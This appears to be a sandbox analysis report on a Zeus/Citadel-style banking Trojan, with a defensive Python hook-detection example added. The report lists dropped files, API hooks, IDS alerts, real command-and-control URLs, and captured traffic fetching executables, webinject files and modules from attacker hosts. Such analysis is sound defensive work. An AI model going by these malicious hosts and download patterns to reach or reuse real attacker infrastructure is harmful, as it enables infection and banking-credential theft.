[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

Dropped PE files

Most of the entries below are not malware components: everything under c:\ea4acb66495575d6b9f323\ (powershell.exe, the Microsoft.PowerShell.* and Microsoft.WSMan.* assemblies, pscustomsetuputil.exe, spuninst.exe and the update\ tools) is the extracted content of WindowsXP-KB968930-x86-ENG.exe, the Windows Management Framework Core package (PowerShell 2.0 and WinRM 2.0) that the sample dropped to Temp and launched, and the ngen.exe, mscorsvw.exe and wsmanhttpconfig.exe activity above is attributable to that installer. The sample's own drops are yfenaromaf.exe, fadehi.exe (the file registered under the Run keys) and new.exe.

MD5 File path
40bafdbf7f27041cef77b05441f9b0c4 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Olifiqtu\yfenaromaf.exe
6f2813669b17c1d1a74507d352b126d8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\fadehi\fadehi.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
d510b5b91adbf3479ef0adc04f00e34c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmp4d895b52\new.exe
85d7ab466d0577c49fc9879107ec7ef5 c:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll
75c183e262bd4400eb0f20349f6ef383 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebf c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll
b87e087fc013225e2aa1cb60c080647d c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll
36ff641f37918f2cca98e7f407ac4d75 c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll
208fa9d0ebe2ceb9616042772e96598e c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll
37bed865557084dd9988350ab1675e0b c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll
d4eefccdc3de6ced901535fa4153c491 c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll
108500a98b9a2f66823e7615398fc87b c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll
5a69fb5d686f863e0e13268d671ef16d c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll
6372ea7d2aced7185183cf3fcdd3577b c:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll
df4217ddb34a0b73dc7aac7829371c0c c:\ea4acb66495575d6b9f323\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\ea4acb66495575d6b9f323\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\ea4acb66495575d6b9f323\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\ea4acb66495575d6b9f323\powershell_ise.resources.dll
fc9a05096522bb6d7ceda62ea1707420 c:\ea4acb66495575d6b9f323\pscustomsetuputil.exe
95b7f12a557dedac5e4a1e9afa5e73ab c:\ea4acb66495575d6b9f323\pspluginwkr.dll
35efd8cd6549a4339cb2a28c8cfd6598 c:\ea4acb66495575d6b9f323\pssetupnativeutils.exe
a94243b797377ba03b63fc716c13bcf5 c:\ea4acb66495575d6b9f323\pwrshmsg.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\ea4acb66495575d6b9f323\pwrshplugin.dll
7943a80f1a6fd37969aacd411b511f91 c:\ea4acb66495575d6b9f323\pwrshsip.dll
066f7fcca265d01a5b7eaf41ade789b1 c:\ea4acb66495575d6b9f323\spmsg.dll
a39df582ca051afc8811fbd00db12f10 c:\ea4acb66495575d6b9f323\spuninst.exe
1b2c60a6d6c3833b413943862b2bfed8 c:\ea4acb66495575d6b9f323\spupdsvc.exe
4d8ab4fad244f7985d8c59d456e026d7 c:\ea4acb66495575d6b9f323\system.management.automation.dll
2286b57ecc2d32d24049c51989084268 c:\ea4acb66495575d6b9f323\system.management.automation.resources.dll
5d6d17b645fa91fce7f0712f3da4f297 c:\ea4acb66495575d6b9f323\update\spcustom.dll
50914702cb6c72275018643c557ef8c5 c:\ea4acb66495575d6b9f323\update\update.exe
9a055da2f2819f155c33d47cd67a7c00 c:\ea4acb66495575d6b9f323\update\updspapi.dll
84e025b1259c66315f4d45a6caecacc9 c:\ea4acb66495575d6b9f323\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\ea4acb66495575d6b9f323\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\ea4acb66495575d6b9f323\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\ea4acb66495575d6b9f323\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\ea4acb66495575d6b9f323\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\ea4acb66495575d6b9f323\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\ea4acb66495575d6b9f323\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\ea4acb66495575d6b9f323\wsmauto.dll
23ce21efc2ae95700f2b1f9582fe3867 c:\ea4acb66495575d6b9f323\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\ea4acb66495575d6b9f323\wsmprovhost.exe
67146d3606be1111a39f0fd61f47e9b6 c:\ea4acb66495575d6b9f323\wsmres.dll
18f347402da544a780949b8fdf83351b c:\ea4acb66495575d6b9f323\wsmsvc.dll
296e6992278fea7140d88b603e6c2a8a c:\ea4acb66495575d6b9f323\wsmwmipl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
PeekMessageW
GetMessageW

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW
RegQueryValueExA
RegQueryValueExW

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
gethostbyname
send
closesocket
getaddrinfo

The Trojan installs the following user-mode hooks in kernel32.dll:

ExitProcess
GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

NtCreateThread

Taken together, this hook set is the profile of a Zeus/Citadel-family banking Trojan, which the IDS verdicts and the atmos_*.module downloads in the Traffic section also point to: the WININET and WS2_32 hooks intercept browser traffic for form grabbing and web injection, the PFXImportCertStore hook lets the bot copy client certificates as they are imported, GetClipboardData together with GetMessageW/PeekMessageW captures clipboard contents and keystrokes, CreateProcessAsUser and NtCreateThread give it a foothold in newly created processes and threads, and GetFileAttributesExW is commonly hooked to hide the bot's own files. All of these are inline hooks in user mode, so each can be confirmed by comparing the first bytes of the export in a browser process with the same bytes in the DLL on disk.
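A check a responder can run against these findings, as an added example (not part of the Lavasoft report): compare each WININET export's prologue as mapped in a browser process with the DLL on disk and classify the trampoline that replaced it. The addresses, module layout and byte strings below are constructed; on a live system the in_memory bytes would come from ReadProcessMemory and the on_disk bytes from the file's export table.

```python
"""Find user-mode inline hooks like the ones listed above by comparing an
export's first bytes as mapped in a process with the same bytes on disk,
then classifying the trampoline that replaced the prologue.

Added example for this report. The byte strings, addresses and module
layout below are constructed; nothing here was read from the sample."""
import struct
from typing import List, NamedTuple, Optional, Tuple

class Export(NamedTuple):
    name: str
    va: int            # virtual address of the export in the process
    in_memory: bytes   # first bytes read from the live process
    on_disk: bytes     # first bytes of the same export in the DLL file

MIN_LEN = 8   # bytes compared; covers every 5/6-byte trampoline below

def classify_prologue(code: bytes) -> str:
    """Name the instruction a hooking engine left at the function start."""
    if len(code) < 5:
        return "too-short"
    if code[0] == 0xE9:                          # jmp rel32
        return "jmp-rel32"
    if code[0] == 0xE8:                          # call rel32
        return "call-rel32"
    if code[:2] == b"\xFF\x25":                  # jmp dword ptr [abs32]
        return "jmp-indirect"
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push-ret"                        # push imm32; ret
    if code[0] == 0xEB:                          # short jmp (hotpatch slot)
        return "jmp-short"
    if code[:5] == b"\x8B\xFF\x55\x8B\xEC":      # mov edi,edi; push ebp; mov ebp,esp
        return "ms-hotpatch-prologue"            # Microsoft's unhooked prologue
    return "other"

def branch_target(va: int, code: bytes) -> Optional[int]:
    """Resolve where a rel32 jmp/call or push/ret placed at address va lands."""
    if code[0] in (0xE9, 0xE8):
        rel = struct.unpack_from("<i", code, 1)[0]
        return (va + 5 + rel) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return struct.unpack_from("<I", code, 1)[0]
    return None

def make_jmp(va: int, target: int) -> bytes:
    """Build the 5-byte 'jmp rel32' a hooking engine writes at va to reach target."""
    return b"\xE9" + struct.pack("<i", target - (va + 5))

def find_hooks(exports: List[Export], module_base: int,
               module_size: int) -> List[Tuple[str, str, Optional[int], str]]:
    """Return (export, trampoline kind, target, verdict) for every changed prologue."""
    findings = []
    for e in exports:
        if e.in_memory[:MIN_LEN] == e.on_disk[:MIN_LEN]:
            continue                             # prologue intact: not hooked
        kind = classify_prologue(e.in_memory)
        target = branch_target(e.va, e.in_memory)
        if target is None:
            verdict = "patched-unknown"
        elif module_base <= target < module_base + module_size:
            verdict = "patched-in-module"        # e.g. a vendor hotpatch; verify
        else:
            verdict = "hooked-out-of-module"     # lands in foreign/injected code
        findings.append((e.name, kind, target, verdict))
    return findings

# --- constructed sample data (assumed addresses, not taken from the sample) ---
WININET_BASE, WININET_SIZE = 0x771B0000, 0x000A5000
MS_PROLOGUE = b"\x8B\xFF\x55\x8B\xEC\x83\xEC\x10"   # mov edi,edi; push ebp; mov ebp,esp; sub esp,10h
INJECTED = 0x00A01000                               # assumed unbacked RWX region holding the bot
SAMPLE = [
    Export("HttpSendRequestW", 0x771C1000,
           make_jmp(0x771C1000, INJECTED) + MS_PROLOGUE[5:], MS_PROLOGUE),
    Export("InternetReadFile", 0x771C2000,
           b"\x68" + struct.pack("<I", INJECTED + 0x40) + b"\xC3" + MS_PROLOGUE[6:], MS_PROLOGUE),
    Export("InternetOpenW", 0x771C3000, MS_PROLOGUE, MS_PROLOGUE),
    Export("HttpQueryInfoA", 0x771C4000,
           make_jmp(0x771C4000, 0x771C4100) + MS_PROLOGUE[5:], MS_PROLOGUE),
]

if __name__ == "__main__":
    for name, kind, target, verdict in find_hooks(SAMPLE, WININET_BASE, WININET_SIZE):
        where = f"{target:#010x}" if target is not None else "?"
        print(f"{name:20s} {kind:12s} -> {where}  {verdict}")
```

Run as a script it prints one line per altered export. A jump that stays inside the module is reported separately because Microsoft's hotpatching and some security products legitimately rewrite prologues; a jump into memory that no module backs is the case worth dumping.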

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             254048        254464    5.09777  a77de89eaf55b3a6eb3c86e9e2fcfdcd
.data   262144           12752         3072      2.67156  585d91141ce4dcbc0176d6d4a54475b4
.reloc  278528           9306          9728      4.20519  ecd715ec6d1021452fd0957d69ffac60

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.cpro.moscow/kent/file.php 195.242.161.117
hxxp://www.google.com/webhp 173.194.113.209
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP 173.194.113.209
hxxp://www.cpro.moscow/kent/exit.php 195.242.161.117
hxxp://changeexchange4.ru/new.exe 194.28.133.91
hxxp://changeexchange4.ru/bindata865.exe 194.28.133.91
hxxp://microsoft.com/ 134.170.188.221
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe 23.64.226.15


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Generic - POST To .php w/Extended ASCII Characters
ET TROJAN Generic -POST To file.php w/Extended ASCII Characters
ET TROJAN Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment
ET TROJAN Zeus Bot GET to Google checking Internet connectivity

Traffic

GET /bindata865.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:22 GMT
ETag: "1c795a1-6242c-5202d2355dc80"
Accept-Ranges: bytes
Content-Length: 402476
Connection: close
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......O.......{.......R.......B...............z.......K.......L.....Ri
ch............PE..L......U..........v..................N............@.
.........................`.......Y.... ...............................
........... .......................@..................................
....h...@............... ............................text...A.........
.................. ..`.rdata...!......."..................@[email protected]...
[email protected]..........................@.
...rsrc........ ......................@[email protected].......@..............
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
.............................................C.1..:H\\......<.o.8..
l..P..H..t6D.o.o..`= ^p|..Q_........6..L.N).....x@=.............<.)
T.!P.o....o.o..n........T:..:../U:i|.:......).o.o..).........L:.....=.
.........T\...........T......S.M.....].....(^.....w.T..]....X\.......x
.!T\S..\\\..T........._.`........._.$........._.|........._.x.........
_.@......\\\\.U.....].........g.D/.........._P.......................g
.P)}......S.X............._X........X..o.....T\....................L..
P......\\\\...\\\\...\\\\.U.....]......g..!...T_..S.T..LS...S...o.

<<< skipped >>>

GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Sun, 20 Sep 2015 13:52:51 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#pA.B...B..
[email protected]............
..............PE..L....jkG.............................c... ..........
. ................................^.......... ........................
..............x.............]. ........... "..........................
.....&..@............ ...............................text........ ....
.................. ..`[email protected]...
x........H].................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................l...V...:...".............
..................|...................................(...r...d...T...
....*...........P...j...................<...................\......
.................................>...L...^...n.....................
......................2...L.......h...p...............................
........(...>...L...`...v...................................N...>
;...,...................d.............................................
..............z...,...<...J...\...|.......N...Z...d...n...@....

<<< skipped >>>

GET /webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: gws
Content-Length: 281
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1442757163:LM=1442757163:V=1:S=wshWM2whNkU12bKk; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=71=XMvwuHf2AYJf-H3X3-9LfytjOF82Yzw25AX3pFcNMCLiNicEeMbCMUhD08OlXnPMnRnB1gMsrYgzsDMrDnawfCkk256_UD-JSIIkHgUhE5AvWpL0AXPpZ_O_3349_pir; expires=Mon, 21-Mar-2016 13:52:43 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-Va
H8KMSAYPvqs9AP&gws_rd=ssl">here</A>...</BODY></H
TML>....


POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache

....$..0..<l..t-..st....sQs.p..YN..(m=..l.%..T.)..f....r.Xe3.9
*<...=.X..z..."Yc1...V,...2g.t\H0Z..9.. .x.eV.%.1.|TO....q.....
.....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 14144
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/kent.xml"
Content-Transfer-Encoding: binary
1....Z.ec...4.....|}..W.X.~."........*..?n.#M..EW.S.n..Xf..p5[.%.O..x5
...q...]...q.!\.l.z...E..i...}...P...e..u..h.dg,b..=..A..I...U.RC.S..B
....9.B;...]b......-..4z^.l.............0.=...........YY..... Y4z$....
..t...o...C}*.j....9...6.N.......?...M.?'X..b.........K..!..$2x...K..^
..._......s.w...U.=.K..\..Su1..=.bB^.N.J.....l...?...S......F.E..%..E.
.. S_x.]...g.,T.B..V5;..)=.b.0@!....v3sBL)....d....%F]..2.H}.......U^.
Bt...)..m...p0.M..%..K.9.N....N.u..<.. {.rl .....O....iq...Y.#;^6..
..`.~,z.Y..HZ...3...Y...~('.9...d.u"...........TJ.*.<.N.xQ/TH(.....
..>p,..M/_..O....f.........K.C..'....q.[2aHm/s.J.DS....7z......._..
...,.(..!JG.#..cB.....0.....=.g....t...%a..."6..!bxj/.<.!..........
E..$]......_J..3Vu.tm...........J-.w..u.h..3...T....rlU..f.a@r^0....6!
..Q_ .o...G..e._qXE........{...F.....d..qv....X.[@}..|..-.:JKO..h.....
...;...$.....................R.f....O..n.....Oz.@?..7.Ee.#~G.......5;.
..f.9.z:..w...#I....;.a.........Vs..s.i^. r..#.&...!.A....K%......z.F.
...>]....a/4.../..L.VC?...4l ..!..... .UI....a.."f....g..k.=qj.n\..
..t.?p=..=}m..k.P.........P...R..tJE.gk..O.......Am..T..1.o....E..)w..
9fu.?...zGn........w.U~S.>3I.......i4.H.D..-KD~f.,H.K....n...9..w..
.4.g-.....L)s.ueYU....b..f.\. ..b..IK.Sxi:.."..j.X..W.^&*.....s..Rb-.j
.v7.vM.....N.eM]..;.va..K.].{Z.M....T..RO......L.*-.....k~;.P...Z.1k=.
fx..P%.kf..w#...=.. ....D..o....$..?x>yy.:..:@..2.#Jq.I(.T8.%..Y...
@[email protected].;}.3/..i...X.'....G].ET..2k....u..3.M.d)...n9.
.Z.....(O..d98.2...u...].z.mw.....\F..:. ....L.q.....-......k?.B..

<<< skipped >>>

POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

1......wf....a.se.......De.7...0......e...w..Q.F.....H..N..)....o.......g... .R...)..R......:....#Gb|. .....lQK.d./.TQ.\rzx...,K.([email protected]>
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 221468
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_ffcookie.module"
Content-Transfer-Encoding: binary
.....Qp.d8... ^c.PK..Q^/-...vii..'E.......a.K..........a[.......F5...}
.%.......j..b...Rq......k.....DC.Y.l.|..6_...1....U..}...WjB|..3%.....
hh....}R.r;1..CV%Q.gM....._.......}xo...(.......$.=Y....z....X...2....
O..>.Ijg.....o...Mx80.&.C.Ti....CL....0..x....I7wN5...ei.$.... *..)
......m.Y...."....PRPk..........8............s.)...a...Ul.B...........
.l......X.~..L..A...x`)..z(....2)..Rqvx.S..{K."........k..L.....9...[.
.Y...&..D..m.J..fNN..Y..c..u.a...W43XphI.'<v....*.f.E.OYZ..F:.X....
n..B....-..Bu..pw.{#........[5....u..5..X7. .0....|...g.q...I.!...j...
........U....E.^bXr....I.~G"7].(...M.)".BHC.,6!..2.b...K..&.b.#q.s...\
8]...'..lC..w....E.....4.c....c}.@$.w..B...9...o...J....DP.`j.t..n....
..)...T\.a.@..^.=...C..X.U....{......(.[...$S....PL.h...6.(....{.t..Y.
..1.r......T.....k.....1..l..C.C..b"Q.Z...A.K`.]:C.....N....o)....7.y.
..E..8..W...x...j........d..Y.../.sid.g..H.Y.`.....hC.W.......v...v..j
...&......S.c...X...ky...nE\.QZ....&.8x.nT.*...u.....<.....U.!.....
....4...us..?......1........W..*YC.......RS3.p..q^.....$.S.=....c..U..
E......-....O..v.w.Y.......*.....G...Tq...6......Z....B.[........ ,..a
..A..a.....R.B....m'.h..[[email protected]....\^.o.". .e...x....
...E.........<i6Y>........k.t...R&..#}.].g........1....:...(.;..
........"......EQ5.........R". ..~.4F......r...x..".`y(...l..a{'.E..._
#._...u=.|."d m>..0&........%..x.tv....x./g.Ty.=..).*Bu7t0..-....&l
t;..l.O.m?.].'....5.8....;....%.4y.M..p.Q^&.....n..@..|V.(._e...M..0..
.sl.|y......&.3b]Z.O..a.........G.. F.2.......;%R..L7.{.(s...<_

<<< skipped >>>

POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 404
Connection: Keep-Alive
Cache-Control: no-cache

I>.d....G.J.]...<.!.X..B..Cp1?....(.R..*....d..=....9h....E
...-c3......8....4...|O.....p.:.Sp5..m
..&..y..E3..q.$...\.B.`7.|w...
...n........T...t.U...L..Cb.Qq
_.).....h.%s.b..0.,?jEQ......|Va......<.du.C...3...N...0]A..S....Q{[email protected]`nI....8.".{:0.l..5A.]...8..#. p."lDn.....qg:.q*...W.`[email protected]?.R..$.V$....g......c.M.C..._..c<.... ...&.]..r.2..Z....T.]A.n....k*...?. .....u7..8.'..<...=vvb
.%1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 305
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5
...q...C..2............no`...............K..3...3......_..M..H.,1gI.v.
...o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh
.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{..
..<./17.JS.:H.h!v......s....HTTP/1.1 200 OK..Server: nginx/1.2.1..D
ate: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-L
ength: 305..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.
1..Vary: Accept-Encoding...2._.7......b...3.{.J.k...........s.{(A3.a^.
..N._..[f...I....l.<%.5...q...C..2............no`...............K..
3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.
....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[.
...Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s....
....



POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

.PLr...`..\...E_%.hO..pC{ny.....
89. C7%d/..;.".7.......e.1...._.i`..O.f.. DR..5B.....2]...,9.8...q....W._....zq
w..7.C...sN\D....7.3..Ajoq.h.S/.2....a1........TF..m./s.n.e_
G.M..M.?!.../.j..i".>.bR..8%C..l=.j8.Hw.M...5Gkb
o.&....Fp...
@...u.E..;k....7l...6..0...'-..;.....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
 ....]..Q.....X.V..MBc.i.%...).... ._73,..&.|..G5.1].h>5.)...K.5...
...A.6.E.
....



POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache

._..1.G.S.....Zw%A.X~"...<.J;....=.. >(..;>{_f.2...Jb:..h.?...bV.)vT(..W|..D..E._.R.....#..C.h........q....w..X{..PX'.,&....[r.zk.qi.......aE...|.
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: application/octet-stream
Content-Length: 9887
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/webinjects/merged-1.txt"
Content-Transfer-Encoding: binary
.[}.h3....H*{.1..;.E...b...K!Hi....4t"..Jx.l4...k..}[email protected] ...w.kM.ts.R.
...|i..uH.r!c........Pk...6.w.P:...zWpt....Y.-...)...i....y"..vyn.J.z.
......vR...........yB.....d\....nh..[.e.}.?Y.g\8Fd[J.#..s.~....H.~H...
~g..er.,....&1...Ggg..!..1fw .y?j.|.E2i_.^.l...Gn.........wD._B;..h01Y
..v..U:..2.4..U.....?.>.Pn...Vy.g..."g.l.60.h8i.`.......5..B.XwS.U.
....X<:...<.(.l..&d:.to.........b.....U...<....d.xf....K.sq[F
